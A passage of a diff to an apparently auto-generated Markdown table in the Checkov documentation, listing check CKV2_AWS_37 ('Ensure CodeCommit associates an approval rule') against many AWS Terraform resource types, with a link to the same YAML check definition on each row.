resource | aws_glue_connection | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1149 | CKV2_AWS_37 | resource | aws_glue_crawler | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1150 | CKV2_AWS_37 | resource | aws_glue_job | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1151 
| CKV2_AWS_37 | resource | aws_glue_security_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1152 | CKV2_AWS_37 | resource | aws_glue_trigger | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1153 | CKV2_AWS_37 | resource | aws_glue_workflow | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1154 | CKV2_AWS_37 | resource | aws_guardduty_detector | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1155 | CKV2_AWS_37 | resource | aws_guardduty_invite_accepter | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1156 | CKV2_AWS_37 | resource | aws_guardduty_ipset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1157 | CKV2_AWS_37 | resource | aws_guardduty_member | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1158 | CKV2_AWS_37 | resource | aws_guardduty_organization_admin_account | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1159 | CKV2_AWS_37 | resource | aws_guardduty_organization_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1160 | CKV2_AWS_37 | resource | aws_guardduty_threatintelset | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1161 | CKV2_AWS_37 | resource | aws_iam_access_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1162 | CKV2_AWS_37 | resource | aws_iam_account_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1163 | CKV2_AWS_37 | resource | aws_iam_account_password_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1164 | CKV2_AWS_37 | resource | 
aws_iam_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1165 | CKV2_AWS_37 | resource | aws_iam_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1166 | CKV2_AWS_37 | resource | aws_iam_group_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1167 | CKV2_AWS_37 | resource | aws_iam_group_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1168 | CKV2_AWS_37 | resource | aws_iam_instance_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1169 | CKV2_AWS_37 | resource | aws_iam_openid_connect_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1170 | CKV2_AWS_37 | resource | aws_iam_policy | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1171 | CKV2_AWS_37 | resource | aws_iam_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1172 | CKV2_AWS_37 | resource | aws_iam_policy_document | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1173 | CKV2_AWS_37 | resource | aws_iam_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1174 | CKV2_AWS_37 | resource | aws_iam_role_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1175 | CKV2_AWS_37 | resource | aws_iam_role_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1176 | CKV2_AWS_37 | resource | aws_iam_saml_provider | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1177 | CKV2_AWS_37 | resource | aws_iam_server_certificate | Ensure CodeCommit 
associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1178 | CKV2_AWS_37 | resource | aws_iam_service_linked_role | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1179 | CKV2_AWS_37 | resource | aws_iam_user | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1180 | CKV2_AWS_37 | resource | aws_iam_user_group_membership | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1181 | CKV2_AWS_37 | resource | aws_iam_user_login_profile | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1182 | CKV2_AWS_37 | resource | aws_iam_user_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1183 | CKV2_AWS_37 | resource | aws_iam_user_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1184 | CKV2_AWS_37 | 
resource | aws_iam_user_ssh_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1185 | CKV2_AWS_37 | resource | aws_inspector_assessment_target | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1186 | CKV2_AWS_37 | resource | aws_inspector_assessment_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1187 | CKV2_AWS_37 | resource | aws_inspector_resource_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1188 | CKV2_AWS_37 | resource | aws_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1189 | CKV2_AWS_37 | resource | aws_internet_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1190 | CKV2_AWS_37 | resource | aws_iot_certificate | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1191 | CKV2_AWS_37 | resource | aws_iot_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1192 | CKV2_AWS_37 | resource | aws_iot_policy_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1193 | CKV2_AWS_37 | resource | aws_iot_role_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1194 | CKV2_AWS_37 | resource | aws_iot_thing | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1195 | CKV2_AWS_37 | resource | aws_iot_thing_principal_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1196 | CKV2_AWS_37 | resource | aws_iot_thing_type | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1197 | CKV2_AWS_37 | resource | aws_iot_topic_rule | Ensure CodeCommit associates an 
approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1198 | CKV2_AWS_37 | resource | aws_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1199 | CKV2_AWS_37 | resource | aws_kinesis_analytics_application | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1200 | CKV2_AWS_37 | resource | aws_kinesis_firehose_delivery_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1201 | CKV2_AWS_37 | resource | aws_kinesis_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1202 | CKV2_AWS_37 | resource | aws_kinesis_video_stream | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1203 | CKV2_AWS_37 | resource | aws_kms_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1204 | CKV2_AWS_37 | resource | 
aws_kms_ciphertext | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1205 | CKV2_AWS_37 | resource | aws_kms_external_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1206 | CKV2_AWS_37 | resource | aws_kms_grant | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1207 | CKV2_AWS_37 | resource | aws_kms_key | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1208 | CKV2_AWS_37 | resource | aws_lambda_alias | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1209 | CKV2_AWS_37 | resource | aws_lambda_event_source_mapping | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1210 | CKV2_AWS_37 | resource | aws_lambda_function | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1211 | CKV2_AWS_37 | 
resource | aws_lambda_function_event_invoke_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1212 | CKV2_AWS_37 | resource | aws_lambda_layer_version | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1213 | CKV2_AWS_37 | resource | aws_lambda_permission | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1214 | CKV2_AWS_37 | resource | aws_lambda_provisioned_concurrency_config | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1215 | CKV2_AWS_37 | resource | aws_launch_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1216 | CKV2_AWS_37 | resource | aws_launch_template | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1217 | CKV2_AWS_37 | resource | aws_lb | Ensure CodeCommit associates an approval rule | Terraform | 
[CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1218 | CKV2_AWS_37 | resource | aws_lb_cookie_stickiness_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1219 | CKV2_AWS_37 | resource | aws_lb_listener | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1220 | CKV2_AWS_37 | resource | aws_lb_listener_certificate | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1221 | CKV2_AWS_37 | resource | aws_lb_listener_rule | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1222 | CKV2_AWS_37 | resource | aws_lb_ssl_negotiation_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1223 | CKV2_AWS_37 | resource | aws_lb_target_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) | +| 1224 | CKV2_AWS_37 | resource | aws_lb_target_group_attachment | 
Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1225 | CKV2_AWS_37 | resource | aws_licensemanager_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1226 | CKV2_AWS_37 | resource | aws_licensemanager_license_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1227 | CKV2_AWS_37 | resource | aws_lightsail_domain | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1228 | CKV2_AWS_37 | resource | aws_lightsail_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1229 | CKV2_AWS_37 | resource | aws_lightsail_key_pair | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1230 | CKV2_AWS_37 | resource | aws_lightsail_static_ip | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1231 | CKV2_AWS_37 | resource | aws_lightsail_static_ip_attachment | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1232 | CKV2_AWS_37 | resource | aws_load_balancer_backend_server_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1233 | CKV2_AWS_37 | resource | aws_load_balancer_listener_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1234 | CKV2_AWS_37 | resource | aws_load_balancer_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1235 | CKV2_AWS_37 | resource | aws_macie_member_account_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1236 | CKV2_AWS_37 | resource | aws_macie_s3_bucket_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1237 | CKV2_AWS_37 | resource | aws_main_route_table_association | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1238 | CKV2_AWS_37 | resource | aws_media_convert_queue | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1239 | CKV2_AWS_37 | resource | aws_media_package_channel | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1240 | CKV2_AWS_37 | resource | aws_media_store_container | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1241 | CKV2_AWS_37 | resource | aws_media_store_container_policy | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1242 | CKV2_AWS_37 | resource | aws_mq_broker | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1243 | CKV2_AWS_37 | resource | aws_mq_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1244 | CKV2_AWS_37 | resource | aws_msk_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1245 | CKV2_AWS_37 | resource | aws_msk_configuration | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1246 | CKV2_AWS_37 | resource | aws_nat_gateway | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1247 | CKV2_AWS_37 | resource | aws_neptune_cluster | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1248 | CKV2_AWS_37 | resource | aws_neptune_cluster_instance | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1249 | CKV2_AWS_37 | resource | aws_neptune_cluster_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1250 | CKV2_AWS_37 | resource | aws_neptune_cluster_snapshot | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1251 | CKV2_AWS_37 | resource | aws_neptune_event_subscription | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
+| 1252 | CKV2_AWS_37 | resource | aws_neptune_parameter_group | Ensure CodeCommit associates an approval rule | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml) |
